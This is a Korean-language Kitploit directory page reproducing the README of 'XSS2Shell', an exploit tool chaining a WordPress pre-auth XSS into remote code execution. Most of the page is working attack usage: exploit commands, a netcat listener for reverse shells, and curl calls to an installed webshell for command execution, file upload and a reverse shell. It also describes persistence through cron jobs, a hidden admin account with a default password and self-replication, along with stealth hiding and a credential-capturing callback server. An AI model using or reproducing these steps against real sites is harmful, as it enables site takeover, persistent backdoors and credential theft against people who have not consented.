Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
XSS2Shell — WordPress 사전 인증 XSS(CVE-2026-64638)를 악용하여 원격 코드 실행을 달성하고, 지속성, 파일 업로드, 리버스 셸 및 스텔스 옵션을 갖춘 AES 암호화 백도어 웹쉘을 설치합니다. 승인된 레드팀 모의 침투 테스트를 위한 도구입니다. | Kitploit
도구/GitHubGitHub/g0d150ne/xss2shell
Persistence MechanismsExploitationWeb Application ExploitationInformation GatheringPost-ExploitationCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubg0d150ne/xss2shell

XSS2Shell

WordPress 사전 인증 XSS(CVE-2026-64638)를 악용하여 원격 코드 실행을 달성하고, 지속성, 파일 업로드, 리버스 셸 및 스텔스 옵션을 갖춘 AES 암호화 백도어 웹쉘을 설치합니다. 승인된 레드팀 모의 침투 테스트를 위한 도구입니다.

10일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

XSS2Shell ULTIMATE v3.0

WordPress 사전 인증(Pre-Auth) XSS → RCE 체인 익스플로잇
개발자: G0D150NE

📌 기능

  • 🔍 XSS 및 WordPress 버전 자동 감지
  • 🎯 3가지 모드: 자동(Auto), XSS, 직접(Direct)
  • 📡 자격 증명을 캡처하는 콜백 서버
  • 🐚 다양한 실행 방식을 지원하는 웹셸
  • 🔄 지속성 유지 (cron 작업, 숨은 관리자, 자가 복제)
  • 📁 파일 업로드/다운로드
  • 🖥️ 원클릭 리버스 셸
  • 🛡️ 스텔스 모드 (플러그인 목록에서 숨김)
  • 🔐 AES-256 암호화 백도어

📦 설치

root@kitploit:~
# 클론
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# 의존성 설치
pip3 install requests beautifulsoup4 cryptography

# 실행
python3 poc.py -h

🚀 빠른 시작

1. 리스너 설정

root@kitploit:~
# 리버스 셸용 터미널 열기
nc -lvnp 4444

2. 익스플로잇 실행

자동 모드 (권장)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

XSS 모드 (자격 증명 없음)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

직접 모드 (자격 증명 사용)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 명령 실행

웹셸 설치 후:

root@kitploit:~
# Base64 인코딩 (권장)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# 일반 명령
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# 파일 업로드
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# 리버스 셸
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 사용 예시

root@kitploit:~
# 1. 자동 스캔 + 익스플로잇
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. 자격 증명 없는 XSS 체인
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. 사용자 지정 포트 및 플러그인 이름
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. 백도어 비밀번호 변경
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. 사용자 지정 콜백 포트
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 명령 옵션

🐚 웹셸 기능

익스플로잇 성공 후:

생성된 숨은 관리자:

  • 사용자명: sysadmin_{slug}
  • 비밀번호: {backdoor-pass} (기본값: G0D150NE)

📸 출력 예시

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 문제 해결

⚠️ 면책 조항

교육 및 인가된 테스트 용도로만 사용하십시오.
소유한 시스템 또는 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.
저자는 오용 또는 피해에 대해 책임을 지지 않습니다.

📞 연락처

  • 저자: G0D150NE
  • CVE: CVE-2026-64638
도구 다운로드
옵션설명기본값
target대상 WordPress URL필수
-u, --usernameWordPress 관리자 사용자명-
-p, --wp-passWordPress 관리자 비밀번호-
--lhost리스너 IP 주소127.0.0.1
--lport리스너 포트4444
--mode익스플로잇 모드 (auto/xss/direct)auto
--slug플러그인 슬러그 이름g0d150ne
--callback-port콜백 서버 포트9090
--backdoor-pass백도어 비밀번호G0D150NE
기능명령
명령 실행?b2h=BASE64_CMD
파일 업로드-F '[email protected]'
리버스 셸?rev=1
일반 명령?cmd=id
암호화 백도어?decrypt=AES_DATA
문제해결 방법
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Connection refused리스너 확인: nc -lvnp 4444
Login failed자격 증명 확인 또는 XSS 모드 사용
Plugin upload failed권한 확인, 다른 slug 사용
Argument conflictwp-pass에는 -p, 백도어에는 --backdoor-pass 사용